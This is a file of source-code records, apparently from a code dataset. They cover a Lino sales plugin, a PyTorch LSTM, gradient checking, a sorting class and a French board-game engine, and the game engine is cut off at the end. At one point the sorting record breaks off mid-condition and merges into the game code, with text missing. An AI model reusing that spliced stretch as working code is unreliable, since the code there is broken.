+{"seq_id":"215771375","text":"# Copyright 2014-2018 Rumma & Ko Ltd\n# License: BSD (see file COPYING for details)\n\n\"\"\"Adds functionality for handling sales.\nSee :doc:`/specs/sales`.\n\n\n.. autosummary::\n :toctree:\n\n fixtures.std\n fixtures.demo_bookings\n\n\"\"\"\n\nfrom lino.api import ad\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass Plugin(ad.Plugin):\n \"See :class:`lino.core.plugin.Plugin`.\"\n\n verbose_name = _(\"Product invoices\")\n\n needs_plugins = ['lino_xl.lib.products', 'lino_xl.lib.vat']\n\n def setup_reports_menu(self, site, user_type, m):\n mg = site.plugins.accounts\n # mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('sales.DueInvoices')\n m.add_action('sales.PrintableInvoicesByJournal')\n\n def setup_config_menu(self, site, user_type, m):\n mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n m.add_action('sales.PaperTypes')\n \n def setup_explorer_menu(self, site, user_type, m):\n mg = site.plugins.vat\n m = m.add_menu(mg.app_label, mg.verbose_name)\n # m = m.add_menu(self.app_label, self.verbose_name)\n m.add_action('sales.Invoices')\n m.add_action('sales.InvoiceItems')\n","sub_path":"lino_xl/lib/sales/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"380675893","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass LSTMSampleWise(nn.Module):\n def __init__(self, config):\n super(LSTMSampleWise, self).__init__()\n\n self.config = config\n\n dropout = 0 if config.n_layers<2 else config.dp_ratio\n\n\n\n self.lstm = nn.LSTM(input_size=config.input_dim,\n hidden_size=config.d_hidden,\n num_layers=config.n_layers,\n batch_first=True,\n dropout=dropout)\n\n self.dropout = nn.Dropout(config.dp_ratio)\n\n self.linear = nn.Linear(config.d_hidden, config.num_classes)\n\n # self.init_hidden(config.batch_size)\n\n self.softmax = nn.Softmax(dim=2)\n self.hidden = None\n\n def init_hidden(self, batch_size):\n # Before we've done anything, we dont have any hidden state.\n # Refer to the Pytorch documentation to see exactly\n # why they have this dimensionality.\n # The axes semantics are (num_layers, minibatch_size, hidden_dim)\n\n\n\n self.hidden = (torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden),\n torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden))\n\n # self.hidden_last = (torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden),\n # torch.zeros(self.config.n_layers, batch_size, self.config.d_hidden))\n #\n # self.last_batch_size = batch_size\n def clear_hidden(self):\n self.hidden = None\n def reuse_hidden(self):\n h = self.hidden[0]\n c = self.hidden[1]\n h = torch.tensor(h.detach())\n c = torch.tensor(c.detach())\n self.hidden = (h, c)\n\n def forward(self, inputs):\n batch_size = inputs.size()[0]\n\n # if self.hidden is None:\n # self.init_hidden(batch_size)\n # else:\n # self.reuse_hidden()\n self.init_hidden(batch_size)\n\n\n\n # if batch_size != self.last_batch_size:\n # if batch_size > self.last_batch_size:\n #\n # print(batch_size)\n\n # print(inputs.shape)\n\n\n\n outputs, self.hidden = self.lstm(\n inputs, self.hidden)\n\n # print('output.shape = ' + str(outputs.shape))\n h = self.dropout(outputs)\n\n x = self.linear(h)\n # print('x.shape = ' + str(x.shape))\n # raise Exception('I know Python!')\n # x = x.view(-1, self.config.num_classes)\n # x = self.softmax(x)\n x = x.view(-1, self.config.num_classes)\n # b = x[0, 0, :]\n #\n # print('b.shape = ' + str(b.shape))\n # print('b = ' + str(b))\n #\n # a = torch.sum(b)\n # print('sum = ' + str(a))\n return x","sub_path":"har_pytorch/model_lstm_reuse_c.py","file_name":"model_lstm_reuse_c.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"57164212","text":"import numpy as np\n\nfrom forward_propagation import forward_propagation\nfrom compute_cost import compute_cost\n\nfrom regularization import compute_cost_with_regularization\nfrom dropout import forward_propagation_with_dropout\n\n\ndef dictionary_to_vector(parameters):\n for i, key in enumerate(parameters.keys()):\n new_vector = np.reshape(parameters[key], (-1, 1))\n if i == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n \n return theta\n\n\ndef vector_to_dictionary(theta, layers_dims):\n L = len(layers_dims)\n parameters = {}\n k = 0\n for l in range(1, L):\n # Create tmp variable to store dimension used on each layer\n w_dim = layers_dims[l] * layers_dims[l-1]\n b_dim = layers_dims[l]\n\n # Create tmp var to be used in slicing theta vector\n tmp_dim = k + w_dim\n \n # Add theta to the dictionary\n parameters[f'W{l}'] = theta[k:tmp_dim].reshape(layers_dims[l], layers_dims[l-1])\n parameters[f'b{l}'] = theta[tmp_dim:tmp_dim + b_dim].reshape(b_dim, 1)\n\n k += w_dim + b_dim\n \n return parameters\n\n\ndef gradients_to_vector(gradients, num_of_layers):\n L = num_of_layers\n keys = []\n for l in range(1, L):\n keys.append(f'dW{l}')\n keys.append(f'db{l}')\n\n filtered_gradients = {}\n for key in keys:\n filtered_gradients[key] = gradients[key]\n\n gradients = filtered_gradients\n\n for i, key in enumerate(gradients):\n new_vector = np.reshape(gradients[key], (-1, 1))\n if i == 0:\n theta = new_vector\n else:\n theta = np.concatenate((theta, new_vector), axis=0)\n \n return theta\n\n\n# Gradient checking\ndef gradient_checking(parameters, gradients, X, Y, layers_dims, _lambda=0, keep_prob=1, epsilon=1e-7):\n # Set-up variables\n parameters_values = dictionary_to_vector(parameters)\n grad = gradients_to_vector(gradients, len(layers_dims))\n num_of_parameters = parameters_values.shape[0]\n J_plus = np.zeros((num_of_parameters, 1))\n J_minus = np.zeros((num_of_parameters, 1))\n grad_approx = np.zeros((num_of_parameters, 1))\n num_of_layers = len(layers_dims) - 1\n\n # Compute grad_approx\n for i in range(num_of_parameters):\n # Compute J_plus[i]\n theta_plus = np.copy(parameters_values)\n theta_plus[i][0] = theta_plus[i][0] + epsilon\n if keep_prob == 1:\n AL, _ = forward_propagation(X, vector_to_dictionary(theta_plus, layers_dims), num_of_layers)\n elif keep_prob < 1:\n AL, _ = forward_propagation_with_dropout(X, vector_to_dictionary(theta_plus, layers_dims), num_of_layers, keep_prob)\n if _lambda == 0:\n J_plus[i] = compute_cost(AL, Y)\n else:\n J_plus[i] = compute_cost_with_regularization(AL, Y, parameters, _lambda, num_of_layers)\n\n # Compute J_minus[i]\n theta_minus = np.copy(parameters_values)\n theta_minus[i][0] = theta_minus[i][0] - epsilon\n if keep_prob == 1:\n AL, _ = forward_propagation(X, vector_to_dictionary(theta_minus, layers_dims), num_of_layers)\n elif keep_prob < 1:\n AL, _ = forward_propagation_with_dropout(X, vector_to_dictionary(theta_minus, layers_dims), num_of_layers, keep_prob)\n if _lambda == 0:\n J_minus[i] = compute_cost(AL, Y)\n else:\n J_minus[i] = compute_cost_with_regularization(AL, Y, parameters, _lambda, num_of_layers)\n \n # Compute grad_approx[i]\n grad_approx[i] = np.divide(J_plus[i] - J_minus[i], 2 * epsilon)\n\n # Compare gradapprox to backward propagation gradients by computing difference\n numerator = np.linalg.norm(grad - grad_approx)\n denominator = np.linalg.norm(grad) + np.linalg.norm(grad_approx)\n difference = np.divide(numerator, denominator)\n\n if difference > 2e-7:\n print 
(\"\\033[93m\" + \"There is a mistake in the backward propagation! difference = \" + str(difference) + \"\\033[0m\")\n else:\n print (\"\\033[92m\" + \"Your backward propagation works perfectly fine! difference = \" + str(difference) + \"\\033[0m\")\n \n return difference\n","sub_path":"neural_networks/gradient_checking/gradient_checking.py","file_name":"gradient_checking.py","file_ext":"py","file_size_in_byte":4186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"529416107","text":"import time\n\nclass Ordenamiento():\n\n #constructor\n def __init__(self,arr=[]):\n self.arr=arr\n self.comp=0\n self.tiempoFinal=0\n self.cambios=0\n \n def orden_creciente(self,arr=None):\n\n if(arr!=None):\n self.arr=arr\n if(len(self.arr)<1):\n return [] \n\n izquierda=list([])\n derecha=list([])\n pivote= list([self.arr[0]])\n\n for i in range(1,len(self.arr),1):\n self.comp+=1\n if self.arr[i]= len(matriceTerrain):\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n if colonneVisee < 0 or colonneVisee >= len(matriceTerrain[0]):\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Liste des positions occupées \n valeursDico = list(infoPion.values())\n positionOccupee = [ valeursDico[i][0] for i in range(len(valeursDico)) if i+1 not in listeGagnants]\n \n # Vérification que la case n'est pas occupée\n if (ligneVisee, colonneVisee) in positionOccupee:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Valeur différente de 0 ou None\n if matriceTerrain[ligneVisee][colonneVisee] == 0 or matriceTerrain[ligneVisee][colonneVisee] == None:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Vérification d'absence de mur\n if direction == 0 and mursHor[ligneVisee][colonneVisee]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 1 and mursHor[infoPion[numeroPion][0][0]][infoPion[numeroPion][0][1]]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 2 and mursVer[infoPion[numeroPion][0][0]][infoPion[numeroPion][0][1]]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n elif direction == 3 and mursVer[ligneVisee][colonneVisee]:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n \n # Cas où les sorties sont actives et où le pion se déplace sur une sortie\n if sortieActive and matriceTerrain[ligneVisee][colonneVisee] == 'sortie':\n listeGagnants.append(numeroPion) # On ajoute le pion à la liste des gagnants\n \n # Gérer les gardes :\n # liste des tuiles utilisées par les pions\n listeTuilesPion = list()\n for pion in range(1, 5):\n if pion not in listeGagnants:\n ligne, colonne = infoPion[pion][0]\n listeTuilesPion.append(matriceTuiles[ligne][colonne][0])\n \n # liste des tuiles utilisées par les gardes\n listeTuilesGarde = list()\n for pion in infoPion.keys():\n if pion > 4:\n ligne, colonne = infoPion[pion][0]\n listeTuilesGarde.append(matriceTuiles[ligne][colonne][0])\n \n \n # Cas où un pion veut se déplacer sur la tuile d'un garde :\n if numeroPion in range(1, 5):\n if matriceTuiles[ligneVisee][colonneVisee][0] in listeTuilesGarde:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Cas où un garde veut se déplacer sur la tuile d'un pion :\n else:\n if matriceTuiles[ligneVisee][colonneVisee][0] in listeTuilesPion:\n infoPion[numeroPion][1] = infoPion[numeroPion][0]\n return\n \n # Si on arrive là, on peut procéder au déplacement\n infoPion[numeroPion] = [(ligneVisee, colonneVisee), infoPion[numeroPion][0]]\n return\n\n\ndef pionSurObjet(matriceTuiles, matriceTerrain, infoPion):\n \"\"\"\n Vérifie si les pions sont sur leur objets respectifs\n\n Args:\n matriceTerrain (list): matrice qui encode le terrain\n infoPion (dict): dictionnaire des positions des joueurs\n Returns:\n True si tous les pions sont sur les bons objets\n False si ne serait-ce qu'un pion n'est pas sur son objet\n\n >>> infoPion = {1 : [(4, 7),(1, 1)], 2 : [(4, 8),(1, 1)], 3 : [(7, 7),(1, 1)], 4 : [(7,8),(1, 1)]}\n >>> 
pionSurObjet(matriceTerrain, infoPion)\n True\n >>> infoPion = {1 : [(4, 8),(1, 1)], 2 : [(4, 8),(1, 1)], 3 : [(7, 7),(1, 1)], 4 : [(7,8),(1, 1)]}\n >>> pionSurObjet(matriceTerrain, infoPion)\n False\n \"\"\"\n # On initialise un compteur de conditions valides qui, si atteint, signifie que toutes les conditions sont réunies\n # pour activer la sortie\n nb_conditions_valides = 0\n # On vérifie pour chaque pion s'il se trouve sur la case de l'objet qui lui est associé\n # Si le bon pion est sur le bon objet, on incrémente le compteur\n for i in range(1, 5):\n if matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] == 'o' + str(i):\n nb_conditions_valides += 1\n # Si le compteur atteint 4, toutes les conditions sont remplies, on renvoie True et on ajoute les 2 gardes supplémentaires\n if nb_conditions_valides == 4:\n ramassageObjets(matriceTerrain, infoPion)\n \n # Il faut trouver les coordonnées de la tuile 2 \n HG = None\n for ligne in range(len(matriceTuiles)):\n for colonne in range(len(matriceTuiles)):\n if matriceTuiles[ligne][colonne][0] != \"$\":\n if int(matriceTuiles[ligne][colonne][0]) == 2:\n HG = (ligne, colonne)\n break\n if HG != None:\n break\n \n # Calcul des positions pour les 2 gardes\n direction = int(matriceTuiles[HG[0]][HG[1]][1])\n print(direction)\n garde2 = [[(0, 2), (3, 3), (3, 0), (0, 0)], [(0, 3), (2, 3), (3, 1), (1, 0)]]\n ligne1, ligne2 = HG[0]+garde2[0][direction][0], HG[0]+garde2[1][direction][0]\n colonne1, colonne2 = HG[1]+garde2[0][direction][1], HG[1]+garde2[1][direction][1]\n \n initPions(6, (ligne1, colonne1), infoPion)\n initPions(7, (ligne2, colonne2), infoPion)\n return True\n # Si une condition n'est pas remplie, on renvoie False\n return False\n\n\n sortieActive = True\n ramassageObjets(matriceTerrain, infoPion)\n\ndef pionSurSablier(matriceTerrain, infoPion):\n \"\"\"return True si un pion est sur une case sablier et supprime la case du tableau\"\"\"\n # return False sinon\n for i in range(1, 5):\n if matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] == 'sablier':\n matriceTerrain[infoPion[i][0][0]][infoPion[i][0][1]] = 1\n return True\n return False\n\ndef renverserHorizontalement(M):\n \"\"\"Renverse une matrice selon un axe horizontal\"\"\"\n matrice = []\n for i in range(1, len(M) + 1):\n matrice.append(M[-i])\n M[:] = matrice\n\ndef transposer(M):\n \"\"\"Transpose une matrice en place\"\"\"\n if len(M) == len(M[0]):\n n = len(M)\n for i in range(n-1):\n for j in range(i+1, n):\n stock = M[i][j]\n M[i][j] = M[j][i]\n M[j][i] = stock\n else:\n n = len(M)\n m = len(M[0])\n M2 = []\n\n for i in range(m):\n M2.append([0]*n)\n\n for i in range(n):\n for j in range(m):\n M2[j][i] = M[i][j]\n M[:] = M2\n\ndef rotationUnQuart(M):\n \"\"\"Fait tourner de 90 un matrice dans le sens horaire\"\"\"\n renverserHorizontalement(M)\n transposer(M)\n\ndef detecterBord(coordonnees, matrice):\n \"\"\"\n return la direction dans laquelle on explore\n \"\"\"\n dico_positions = {(-1, 0): 0, #haut\n (1, 0): 2, #bas\n (0, -1): 3, #gauche\n (0, 1): 1 #droite\n }\n for position, valeur in dico_positions.items():\n if matrice[coordonnees[0] + position[0]][coordonnees[1] + position[1]] == None:\n return valeur\n\ndef positionTuileExplo(coordonnees, direction):\n \"\"\"\n return les coordonnées sur la matrice où il faut commencer à écrire la tuile explorée\n \"\"\"\n if direction == 0:\n return coordonnees[0] - 4, coordonnees[1] - 1\n if direction == 1:\n return coordonnees[0] - 1, coordonnees[1] + 1\n if direction == 2:\n return coordonnees[0] + 1, coordonnees[1] - 2\n 
if direction == 3:\n return coordonnees[0] - 2, coordonnees[1] - 4\n \ndef extractionMatriceTuile(choix):\n \"\"\"Renvoie la mini-matriceTerrain ainsi que les matrices de murs horizontaux et \n Verticaux de la tuile selectionnée\"\"\"\n numero, direction = choix\n \n if numero == 2:\n matrice = tuile2()\n murV = tuile2MursV()\n murH = tuile2MursH()\n \n elif numero == 3:\n matrice = tuile3()\n murV = tuile3MursV()\n murH = tuile3MursH()\n \n elif numero == 4:\n matrice = tuile4()\n murV = tuile4MursV()\n murH = tuile4MursH()\n \n elif numero == 5:\n matrice = tuile5()\n murV = tuile5MursV()\n murH = tuile5MursH()\n \n elif numero == 6:\n matrice = tuile6()\n murV = tuile6MursV()\n murH = tuile6MursH()\n \n elif numero == 7:\n matrice = tuile7()\n murV = tuile7MursV()\n murH = tuile7MursH()\n \n elif numero == 8:\n matrice = tuile8()\n murV = tuile8MursV()\n murH = tuile8MursH()\n \n elif numero == 9:\n matrice = tuile9()\n murV = tuile9MursV()\n murH = tuile9MursH()\n \n # rotation de la tuile e fonction de la direction\n for i in range(direction):\n rotationUnQuart(matrice)\n rotationUnQuart(murV)\n rotationUnQuart(murH)\n \n # échange des murs horizontaux et verticaux en fonction de la direction\n if direction%2:\n murV, murH = murH, murV\n \n return matrice, murV, murH\n \n\ndef pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dic2, dic7, dicVortex, tuilesPosees, exploBool, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes):\n \"\"\"Vérifie si un pion est sur sa case d'exploration, si c'est le cas,\n place une nouvelle tuile au bon endroit\"\"\"\n \n # Vérification de si un pion est sur une case exploration correspondante à\n # une tuile non-explorée\n couplePionPos = list(infoPion.items())\n for pion, position in couplePionPos:\n if (len(tuilesRestantes)>0 and matriceTerrain[position[0][0]][position[0][1]] == 'exp'+str(pion)): #or (matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n # if (matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]] is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n # pion = 3\n # position = infoPion[3][0]\n \n direction = detecterBord(position[0], matriceTerrain)\n if direction == None:\n return\n \n exploAl = exploBool\n # sélection d'une tuile à ajouter au hasard si il n'y a pas de télékinésie\n if exploAl:\n choix = rand.choice(tuilesRestantes)\n tuilesRestantes.remove(choix)\n tuilesPosees.append(choix)\n else:\n telekinesie(matriceTerrain, matriceTuiles, tuilesPosees[telekinesieIndexTuileActive[0]], dicEsc, dicVortex, telekinesiesRestantes)\n choix = tuilesPosees[telekinesieIndexTuileActive[0]]\n telekinesieIndexTuileActive[0] = 0\n \n\n matrice, murV, murH = extractionMatriceTuile((choix, direction))\n \n # trouver la case à partir de laquelle ajouter la tuile sur plateau\n L, C = positionTuileExplo(position[0], direction)\n\n if choix == 2:\n for cle, valeur in dic2[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n if choix == 7:\n for cle, valeur in dic7[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n # changeons les valeurs de matriceTerrain et de matriceTuiles\n matriceTerrain[position[0][0]][position[0][1]] = 1\n \n for ligne in range(len(matrice)):\n for colonne in range(len(matrice[0])):\n matriceTerrain[ligne+L][colonne+C] = 
matrice[ligne][colonne]\n if matriceTerrain[ligne+L][colonne+C] in ('vortex1', 'vortex2', 'vortex3', 'vortex4'):\n dicVortex[int(matriceTerrain[ligne+L][colonne+C][-1])].append((ligne+L, colonne+C))\n matriceTuiles[ligne+L][colonne+C] = str(choix)+str(direction)\n for ligne in range(len(murV)):\n for colonne in range(len(murV[0])):\n if mursVer[ligne + L][colonne + C - 1] == 0:\n mursVer[ligne + L][colonne + C - 1] = murV[ligne][colonne]\n\n for ligne in range(len(murH)):\n for colonne in range(len(murH[0])):\n if mursHor[ligne + L - 1][colonne + C] == 0:\n mursHor[ligne + L - 1][colonne + C] = murH[ligne][colonne]\n \n # placement des gardes lors de l'apparition de la case 9\n garde9 = [(3,3), (0,3), (0,0), (3,0)]\n if choix == 9:\n initPions(5, (garde9[direction][0]+L, garde9[direction][1]+C), infoPion)\n \n # print(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]], 'moulaga')\n # if type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]) is str :\n # print('censé être str',type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]))\n # print(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1],'exp')\n # print(modeTelekinesie, '1')\n if (type(matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]]) is str and matriceTerrain[infoPion[3][0][0]][infoPion[3][0][1]][:-1] == 'exp' and modeTelekinesie[0] == 1):\n position = infoPion[3][0]\n \n direction = detecterBord(position, matriceTerrain)\n if direction == None:\n return\n \n telekinesie(matriceTerrain, matriceTuiles, tuilesPosees[telekinesieIndexTuileActive[0]], dicEsc, dicVortex, telekinesiesRestantes)\n choix = tuilesPosees[telekinesieIndexTuileActive[0]]\n telekinesieIndexTuileActive[0] = 0\n matrice, murV, murH = extractionMatriceTuile((choix, direction))\n \n # trouver la case à partir de laquelle ajouter la tuile sur plateau\n L, C = positionTuileExplo(position, direction)\n\n if choix == 2:\n for cle, valeur in dic2[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n if choix == 7:\n for cle, valeur in dic7[direction].items():\n dicEsc[(cle[0] + L, cle[1] + C)] = (valeur[0] + L, valeur[1] + C)\n # changeons les valeurs de matriceTerrain et de matriceTuiles\n matriceTerrain[position[0]][position[1]] = 1\n \n for ligne in range(len(matrice)):\n for colonne in range(len(matrice[0])):\n matriceTerrain[ligne+L][colonne+C] = matrice[ligne][colonne]\n if matriceTerrain[ligne+L][colonne+C] in ('vortex1', 'vortex2', 'vortex3', 'vortex4'):\n dicVortex[int(matriceTerrain[ligne+L][colonne+C][-1])].append((ligne+L, colonne+C))\n matriceTuiles[ligne+L][colonne+C] = str(choix)+str(direction)\n for ligne in range(len(murV)):\n for colonne in range(len(murV[0])):\n if mursVer[ligne + L][colonne + C - 1] == 0:\n mursVer[ligne + L][colonne + C - 1] = murV[ligne][colonne]\n\n for ligne in range(len(murH)):\n for colonne in range(len(murH[0])):\n if mursHor[ligne + L - 1][colonne + C] == 0:\n mursHor[ligne + L - 1][colonne + C] = murH[ligne][colonne]\n \n # placement des gardes lors de l'apparition de la case 9\n garde9 = [(3,3), (0,3), (0,0), (3,0)]\n if choix == 9:\n initPions(5, (garde9[direction][0]+L, garde9[direction][1]+C), infoPion)\n return\n\ndef ramassageObjets(matriceTerrain, infoPion):\n \"\"\"\n \"Ramasse\" les objets sur le terrain et remplace dans matrice terrain 'o1' à 'o4' par 1, qui correspond à une case normale.\n Args:\n matriceTerrain (list) : le terrain de jeu codé en format matriciel\n infoPion (dict) : dictionnaire des postions des pions\n Returns:\n None\n \"\"\"\n \n # On 
parcourt les positions des joueurs et on remplace la valeur de la case\n # sur laquelle ils sont par 1\n listePions = infoPion.values()\n for positionObjet in listePions:\n ligne = positionObjet[0][0]\n colonne = positionObjet[0][1]\n matriceTerrain[ligne][colonne] = 1\n return\n\ndef selecteurPion(numPion, infoPion, listeGagnants):\n \"\"\"\n Change le pion actuellement en train d'être joué par le suivant.\n Les pions suivent toujours le même roulement.\n Un pion qui a gagné (rentré dans la sortie) est sauté lors du roulement\n Args:\n numPion (int) : les entiers de 1 à 4 sont les valeurs possibles\n infoPion (dict) : dictionnaire contenant les clés correspondant à chaque pion (1 à 4)\n listeGagnants (list) : liste des pions ayant atteint la sortie\n Returns:\n numPion (int) + 1, sauf 4 qui devient 1\n >>> infoPion = {1: [(9, 0), (9, 1)], 2: [(4, 8), (5, 8)], 3: [(7, 7), (6, 7)], 4: [(7, 8), (6, 8)]}\n >>> listeGagnants = []\n >>> selecteurPion(1, infoPion, listeGagnants)\n 2\n >>> selecteurPion(2, infoPion, listeGagnants)\n 3\n >>> selecteurPion(3, infoPion, listeGagnants)\n 4\n >>> selecteurPion(4, infoPion, listeGagnants)\n 1\n >>> listeGagnants = [1, 2, 3]\n >>> selecteurPion(1, infoPion, listeGagnants)\n 4\n \"\"\"\n # On cherche le prochain pion jouable parmi la liste des pions valides (les pions non-gagnants)\n # while True:\n # if ((numPion + 1) % 5 in infoPion) and ((numPion + 1) % 5 not in listeGagnants):\n # return numPion + 1\n # numPion = (numPion + 1) % 5\n numPion += 1\n while numPion in listeGagnants or numPion not in infoPion.keys():\n numPion = numPion+1 if numPion+1 < 8 else 1\n return numPion\n \ndef gestionEntreeClavier(matriceTerrain, mursVer, mursHor, infoPion, pionActif, sortieActive, debugActif, vitesse, listeGagnants, dicVortex, dicEsc, dicTuile2, dicTuile7, modeVortex, vortexActif, touchesPartie, touchesPartieParJoueur, nb_joueurs, touchesDeBase, tempsRestant, matriceTuiles, tuilesRestantes, tuilesPosees, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes):\n \"\"\"\n Regarde sur quelle touche le/les joueurs appuient, et réagit en conséquence\n\n Returns:\n None.\n\n \"\"\"\n # Gestion du mode debug\n if debugActif == 1:\n entreeClavier = tk.attente_touche_jusqua(vitesse)\n if entreeClavier == None:\n entreeClavier = debugMode()\n \n # Mode normal \n else:\n entreeClavier = tk.attente_touche_jusqua(250)\n\n # Gestion des entrées utilisateurs/debug\n if entreeClavier == touchesPartie['haut'][0]:\n deplacementPion(pionActif[touchesPartie['haut'][1]], 0, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['gauche'][0]:\n deplacementPion(pionActif[touchesPartie['gauche'][1]], 3, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['bas'][0]:\n deplacementPion(pionActif[touchesPartie['bas'][1]], 1, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n \n elif entreeClavier == touchesPartie['droite'][0]:\n deplacementPion(pionActif[touchesPartie['droite'][1]], 2, matriceTerrain, mursVer, mursHor, infoPion, sortieActive, listeGagnants, matriceTuiles)\n\n elif entreeClavier == touchesPartie['escalier'][0]:\n escalier(pionActif[touchesPartie['escalier'][1]], dicEsc, infoPion, listeGagnants)\n\n elif entreeClavier == touchesPartie['vortex'][0][0]:\n if pionActif[touchesPartie['vortex'][1]] < 5:\n activerVortex(pionActif[touchesPartie['vortex'][1]], dicVortex, infoPion, 
modeVortex, vortexActif, listeGagnants)\n\n elif entreeClavier == touchesPartie['vortex'][0][1] and modeVortex == [1]:\n selectVortex(vortexActif, dicVortex, pionActif[touchesPartie['vortex'][1]])\n\n elif entreeClavier == touchesDeBase[1]['changerPion']:\n pionActif[1] = selecteurPion(pionActif[1], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[2]['changerPion'] and nb_joueurs in (2, 3):\n pionActif[2] = selecteurPion(pionActif[2], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[3]['changerPion'] and nb_joueurs == 3:\n pionActif[3] = selecteurPion(pionActif[3], infoPion, listeGagnants)\n\n elif entreeClavier == touchesDeBase[1]['elfe'][0] and pionActif[1] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[2]['elfe'][0] and nb_joueurs in (2, 3) and pionActif[2] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[3]['elfe'][0] and nb_joueurs == 3 and pionActif[3] == 3 and telekinesiesRestantes[0] > 0:\n activerModeTelekinesie(infoPion, telekinesieIndexTuileActive, tuilesPosees, modeTelekinesie, matriceTerrain, matriceTuiles, mursVer, mursHor, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, telekinesiesRestantes)\n\n elif entreeClavier == touchesDeBase[1]['elfe'][1] and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesDeBase[2]['elfe'][1] and nb_joueurs in (2, 3) and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesDeBase[3]['elfe'][1] and nb_joueurs == 3 and modeTelekinesie == [1] and telekinesiesRestantes[0] > 0:\n selectTuileTelekinesie(telekinesieIndexTuileActive, tuilesPosees, matriceTuiles, infoPion, mursVer, mursHor, matriceTerrain)\n\n elif entreeClavier == touchesPartie['vortex'][0][1] and modeVortex == [1]:\n selectVortex(vortexActif, dicVortex, pionActif[touchesPartie['vortex'][1]])\n\n elif entreeClavier == touchesPartie['exploration'][0]:\n pionSurExploration(matriceTerrain, matriceTuiles, mursVer, mursHor, infoPion, tuilesRestantes, dicEsc, dicTuile2, dicTuile7, dicVortex, tuilesPosees, True, telekinesieIndexTuileActive, modeTelekinesie, telekinesiesRestantes)\n\n elif entreeClavier == 'w':\n debugActif *= -1\n \n elif entreeClavier == 'x':\n vitesse = vitesse**(-1)\n \n elif entreeClavier == 'twosuperior':\n tempsPause = pause()\n return tempsPause\n \n elif entreeClavier == 'BackSpace':\n sauvegarderPartie(matriceTerrain, infoPion, nb_joueurs, sortieActive, tempsRestant, touchesPartie, touchesPartieParJoueur, listeGagnants, matriceTuiles, mursVer, mursHor, tuilesPosees, dicVortex, dicEsc, telekinesiesRestantes)\n \n elif entreeClavier == 'Escape':\n tk.ferme_fenetre()\n\n return 0\n\ndef escalier(numeroPion, dicEsc, infoPion, listeGagnants):\n \"\"\"Transporte un pion au bon endroit lors de l'usage d'un 
